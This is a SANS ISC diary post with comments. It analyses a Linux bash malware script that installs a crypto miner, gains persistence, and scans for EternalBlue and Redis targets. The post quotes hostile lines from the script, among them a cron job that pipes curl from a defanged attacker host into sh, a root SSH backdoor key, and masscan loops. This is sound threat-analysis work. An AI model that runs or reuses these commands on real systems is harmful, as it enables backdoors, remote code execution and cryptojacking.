Threat Level: green Handler on Duty: Didier Stevens

SANS ISC: Malicious Bash Script with Multiple Features - SANS Internet Storm Center SANS ISC InfoSec Forums

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Malicious Bash Script with Multiple Features

It’s not common to find a complex malicious bash script. Usually, bash scripts are used to download a malicious executable and start it. This one has been spotted by @michalmalik[1] who twitted about it. I had a quick look at it. The script has currently a score of 13/50 on VT[2]. First of all, the script installs some tools and dependencies. 'apt-get' and 'yum'  are used, this means that multiple Linux distributions are targeted. The following packages are installed: wget, git, make, python, redis-tools, gcc, build-essentials. Some Python packages are installed via PIP.

The primary goal of the script is to install a crypto miner. To optimize performances, the number of CPUs is tested:

if [ $cpunum -gt 4 ];
threads=`expr $cpunum / 2`

Three first files are downloaded:


'clay' is a known trojan[3]. 'minerd' is, as the name says, a crypto miner[4]. This is an x64 binary. 'glib-2.14.tar.gz' (SHA256: 18d9a0296260fd9529d59229c1dcb130ee8a18a1dd71c23712c39056cc0eb0b3) contains the libraries required by minerd. The crypto miner uses stratum+tcp://

Then crontab entries are added for persistence:

echo "*/5 * * * * curl -fsSL hxxp://xksqu4mj.fri3nds[.]in/tools/ | sh" > /var/spool/cron/root

The nasty stuff is the installation of the attack SSH key:

echo "ssh-rsa AAAAB3N ...[redacted]... Mq/jc5YLfnAnbGVbBMhuWzaWUp root@host-10-10-10-26" >> /root/.ssh/authorized_keys

I don't know why they add a key for the root user. By default, ssh does not allow root login. They should create a new user and add it to the 'sudo' group!

Then, Redis via port TCP/6379 (see below why):

PS3=$(iptables -L | grep 6379 | wc -l)
if [ $PS3 -eq 0 ];
yum -y install iptables-services
iptables -I INPUT 1 -p tcp --dport 6379 -j DROP
iptables -I INPUT 1 -p tcp --dport 6379 -s -j ACCEPT
service iptables save
/etc/init.d/iptables-persistent save

The next step is to download the 'masscan' port scanner and another bunch of scripts:


The tar file contains scripts which generate ranges of IP addresses and scan for EternalBlue[4] vulnerable hosts (Windows hosts):

while read line
    masscan -p445 $line --rate=20000 | tee -a masscan
done < ip

For Linux hosts, Redis vulnerable instances are targeted:

while read line
    masscan -p6379 $line --rate=20000 | tee -a masscan
done < ip

The goal is to find new vulnerable hosts, pivot (lateral movement) and deploy the same script.

As a final note, some attackers are able to write "nice" (read: malicious code) but they still fail to protect their resources. All their material is available via directory indexing:

Credit to finding the script goes to Michal Malik[6].


Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant


364 Posts
ISC Handler
Is "ython" something or is there actually a missing "p" in one of those scripts? Makes you wonder how it happened...

8 Posts Posts
It's a typo (probably when I copy/paste the code and formated it to fit in the diary)

364 Posts Posts
ISC Handler

Sign Up for Free or Log In to start participating in the conversation!